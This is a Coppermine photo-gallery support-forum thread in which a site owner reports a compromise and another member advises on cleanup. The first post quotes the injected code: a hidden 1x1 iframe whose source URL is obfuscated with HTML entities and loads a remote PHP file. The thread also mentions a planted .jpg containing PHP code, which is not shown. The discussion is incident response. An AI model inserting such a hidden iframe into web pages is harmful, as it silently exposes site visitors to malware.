iframe in our cpg installation iframe in our cpg installation
 

News:

cpg1.5.48 Security release - upgrade mandatory!
The Coppermine development team is releasing a security update for Coppermine in order to counter a recently discovered vulnerability. It is important that all users who run version cpg1.5.46 or older update to this latest version as soon as possible.
[more]

Main Menu

iframe in our cpg installation

Started by Joach, April 19, 2008, 12:12:30 PM

Previous topic - Next topic

0 Members and 1 Guest are viewing this topic.

Print
Go Down Pages1
User actions

Joach

April 19, 2008, 12:12:30 PM
Hi,
today I discovered strange code (iframe) right behind the body tag in our cpg 1.4.15 installation. The code is:

Code Select
<iframe src='&#104;&#116;&#116;&#112;&#58;&#47;&#47;&#99;&#99;&#102;&#101;&#108;&#111;&#109;&#118;&#104;&#107;&#46;&#99;&#111;&#109;&#47;&#100;&#108;&#47;&#97;&#100;&#118;&#53;&#52;&#50;&#46;&#112;&#104;&#112;' width=1 height=1></iframe>

I believe this does not belong there right?
I fixed manually upgrade 1.4.17 and start now to upgrade to 1.4.1.8
Any further advice is highly appreciated.

Joach



Joach

#1
April 19, 2008, 12:26:55 PM
In the cpg folder "userpicts" I discovered a file "5563131x.jpg".
When I open this file there is php code inside.
I post the file code as (.txt)-attachement.

Thanks again for advice, Joach

skyone

#2
April 19, 2008, 12:29:56 PM
read this topic http://forum.coppermine-gallery.net/index.php/topic,51927.0.html

you gallery was hacked like mine was. You will have to sanitize all your files.
almost every single php file on my gallery had the I frame, remove it. Aso all the html files on my main website, I just upload them again. I had a file 45563131x.jpg on my album folder, I deleted it. Delete your 5563131x file .The hacker put it there
Check your gallery configuration too as this hacker changed some settings.
You should change your password too
Print
Go Up Pages1
User actions